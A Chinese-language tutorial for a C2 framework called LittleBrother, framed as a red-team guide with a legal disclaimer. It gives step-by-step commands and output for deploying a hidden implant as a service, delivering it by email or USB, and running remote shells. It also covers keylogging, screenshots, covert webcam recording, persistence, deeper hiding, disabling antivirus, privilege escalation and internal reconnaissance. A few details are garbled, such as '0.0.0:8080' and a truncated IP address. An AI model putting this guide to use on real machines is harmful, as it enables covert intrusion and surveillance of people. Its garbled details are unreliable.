第一部分：什么是 LittleBrother？

LittleBrother (简称 LB) 是一款开源的、功能强大的 C2 (Command & Control) 框架，它的主要目的是为红队安全测试人员、渗透测试工程师提供一个灵活、隐蔽、可扩展的平台，用于模拟攻击者的行为,对目标网络或系统进行安全评估。

核心特点：

1. 跨平台：服务端和客户端均支持 Windows 和 Linux。
2. 隐蔽性强：客户端默认以系统服务形式运行，无弹窗，不显示在任务管理器进程列表中,难以被常规手段发现。
3. 功能全面：内置了文件管理、进程管理、屏幕监控、键盘记录、摄像头控制、权限提升、横向移动等多种功能模块。
4. 模块化设计：所有功能都以插件（模块）形式存在，用户可以按需加载,也可以自行开发新模块。
5. 通信加密：服务端和客户端之间使用加密通信,流量特征不明显。
6. 多客户端管理：一个服务端可以同时管理多个被控端（客户端）。

重要声明：本教程仅供学习和授权的安全测试使用，未经授权对任何计算机或网络系统进行控制、攻击或测试都是违法行为，请务必在获得明确书面授权的环境中使用 LittleBrother。

第二部分：环境准备

在开始之前,你需要准备两台机器：

1. 攻击机 (服务端)：用于运行 LB 服务端，管理和控制客户端，推荐使用 Kali Linux 或 Parrot OS，也可以是 Windows 10/11。
2. 目标机 (客户端)：需要被控制的机器，可以是虚拟机、物理机或云服务器，为了演示，建议使用一台独立的虚拟机（如 Windows 10）。

软件下载：

• 从 LittleBrother 的官方 GitHub 仓库下载最新版本。
  • GitHub 地址: https://github.com/LittleBrotherC2/LittleBrother
• 下载后你会得到两个主要文件：
  • littlebrother_server (服务端程序)
  • littlebrother_client (客户端程序)

第三部分：服务端 (Server) 配置与启动

服务端是你的指挥中心。

步骤 1：生成客户端

这是最关键的一步，LB 客户端与服务端是一一绑定的，不能混用,你需要用服务端来生成一个专用的客户端。

1. 在你的攻击机上，解压下载的 LB 服务端文件。

2. 打开终端（Linux）或命令提示符（Windows）,进入服务端目录。

   
   （图片来源网络，侵删）

3. 运行以下命令来生成客户端：

   # Linux/macOS
   ./littlebrother_server -genclient
   # Windows
   .\littlebrother_server.exe -genclient

4. 命令会提示你输入一个密码，这个密码是客户端连接服务端的凭证，请务必记住它。

   [+] Please enter a password for the client: your_strong_password
   [+] Client file generated successfully: client.your_strong_password

5. 执行完毕后，你会得到一个名为 client.your_strong_password 的文件,这就是你之后需要部署到目标机上的客户端。

步骤 2：启动服务端

启动你的服务端,开始监听来自客户端的连接。

1. 在同一个终端中,运行以下命令启动服务端：

   # Linux/macOS
   ./littlebrother_server
   # Windows
   .\littlebrother_server.exe

2. 服务端启动后，会显示监听的信息，通常包括监听的 IP 地址和端口（默认是 0.0.0:8080）。

   [+] LittleBrother C2 Server v1.0
   [+] Listening on 0.0.0.0:8080
   [+] Waiting for clients to connect...

   • 注意：如果你的攻击机和目标机在不同的网络中（你在家里，目标机在云上），你需要确保攻击机的防火墙允许 8080 端口的入站连接，并且可能需要进行端口转发或使用内网穿透工具（如 frp, ngrok）才能让客户端成功连接。

第四部分：客户端 (Client) 部署

客户端是植入到目标机上的“间谍”程序。

步骤 1：准备客户端文件

将上一步生成的 client.your_strong_password 文件传输到你的目标机上，你可以使用 U 盘、网页下载、邮件附件等多种方式。

步骤 2：安装客户端

在目标机上打开终端（Linux）或命令提示符（Windows）,进入客户端文件所在的目录。

1. 在 Windows 上安装：

   client.your_strong_password.exe -i

   • -i 参数表示 install（安装），执行后，客户端会将自己安装成一个名为 "LittleBrother Service" 的Windows 服务，并自动启动，你可以在 services.msc 中找到它，并且它默认是“正在运行”状态。

2. 在 Linux 上安装：

   ./client.your_strong_password -i

   • 同样，-i 参数会安装客户端，在 Linux 上，它会配置为开机自启，并作为一个 systemd 服务运行。

安装成功后，客户端会立即尝试连接你在服务端指定的 IP 地址和端口。

第五部分：连接与使用

让我们回到攻击机的服务端终端,看看发生了什么。

步骤 1：检查客户端连接

当目标机上的客户端成功连接到服务端后,你的服务端终端会显示一条新消息：

[+] New client connected from 192.168.1.101:54321
[+] Client ID: 1

• 168.1.101:54321 是目标机的 IP 地址和临时端口。
• Client ID: 1 是分配给这个客户端的唯一 ID，如果你控制了多个目标，每个都会有不同的 ID。

步骤 2：交互式 Shell

LB 提供了一个交互式命令行界面来控制客户端，输入 help 或 可以查看所有可用的命令。

[+] Client 1 connected. Type 'help' for commands.
lb>

步骤 3：常用命令详解

以下是核心命令的使用方法：

1. info：获取客户端的基本信息。

   lb> info
   [*] Client ID: 1
   [*] Hostname: WIN10-VM
   [*] OS: Windows 10 (x64)
   [*] User: NT AUTHORITY\SYSTEM
   [*] IP: 192.168.1.101
   [*] Connected at: 2025-10-27 10:30:00

2. shell：在目标机上执行任意命令并获取输出,这是最常用的功能之一。

   lb> shell whoami
   [*] Executing 'whoami' on client 1...
   nt authority\system
   lb> shell ipconfig
   [*] Executing 'ipconfig' on client 1...
   ... (ipconfig 的输出结果) ...

3. upload / download：在攻击机和目标机之间传输文件。

   • 上传文件到目标机：

     lb> upload C:\path\to\local\file.txt C:\Users\Public\file.txt
     [*] Uploading file... Done.

   • 从目标机下载文件：

     lb> download C:\path\to\remote\file.txt C:\path\to\local\file.txt
     [*] Downloading file... Done.

4. keylog：开启或关闭键盘记录功能。

   • lb> keylog start：开始记录。
   • lb> keylog stop：停止记录。
   • lb> keylog read：读取记录的按键内容。

5. screenshot：截取目标机的屏幕。

   lb> screenshot
   [*] Taking screenshot... Saved as 'screenshot_1.png'.

   截图文件会保存在服务端所在的目录下。

6. webcam：控制目标机的摄像头。

   • lb> webcam list：列出可用的摄像头设备。
   • lb> webcam snapshot 0：对第一个摄像头拍照，保存为 webcam_snapshot_0.png。
   • lb> webcam record 0 10：录制第一个摄像头 10 秒的视频，保存为 webcam_record_0.mp4。

7. ps / kill：管理目标机上的进程。

   • lb> ps：列出所有进程。
   • lb> kill 1234：结束 PID 为 1234 的进程。

8. persistence：管理持久化机制（即开机自启）。

   • lb> persistence add：添加持久化。
   • lb> persistence remove：移除持久化。

9. exit：断开与当前客户端的连接,回到服务端主界面等待其他客户端。

第六部分：进阶技巧与注意事项

1. 模块化使用：LB 的很多功能（如键盘记录、屏幕截图）都是通过模块实现的，你可以使用 modules 命令来加载和管理它们,但这通常在更高级的配置或自定义开发中才会用到。

2. 隐蔽性：

   • Windows：客户端安装为服务后，默认不会在任务管理器的“进程”标签页显示，但在“服务”标签页可见，为了更隐蔽，可以配合其他工具（如 Process Hacker）修改服务描述或进行更深度的隐藏。
   • Linux：作为 systemd 服务运行,非常隐蔽。

3. 错误排查：

   • 客户端无法连接：
     • 检查服务端 IP 和端口是否正确。
     • 检查目标机是否能访问到服务端的 IP 和端口（ping 和 telnet 测试）。
     • 检查服务端和客户端的密码是否一致。
     • 检查目标机的防火墙是否阻止了连接。
   • 命令无响应：
     • 检查目标机是否杀毒软件拦截了 LB 客户端的行为,可以尝试暂时关闭杀毒软件或添加白名单。
     • 检查目标机是否有其他安全软件（如 EDR）在监控异常进程行为。

4. 安全测试流程：

   • 信息收集：使用 info 和 shell 收集目标系统信息。
   • 权限维持：使用 persistence 确保控制权。
   • 权限提升：利用 shell 执行已知漏洞的提权脚本（如 Juicy Potato）。
   • 内网探测：在获得初步立足点后，使用 shell 执行 ipconfig, arp -a, netstat -an 等命令探测内网环境,为横向移动做准备。

第七部分：总结

通过这份教程，你应该已经掌握了 LittleBrother 的基本使用流程：

1. 生成专属客户端。
2. 启动服务端,准备接收连接。
3. 在目标机上安装客户端。
4. 通过服务端的交互式 Shell，使用 info, shell, upload, screenshot 等命令对目标机进行控制。

LittleBrother 是一个非常优秀的 C2 框架，其模块化的设计和强大的功能使其在红队测试中极具价值，请务必在合法授权的前提下，勤加练习,深入探索其高级功能。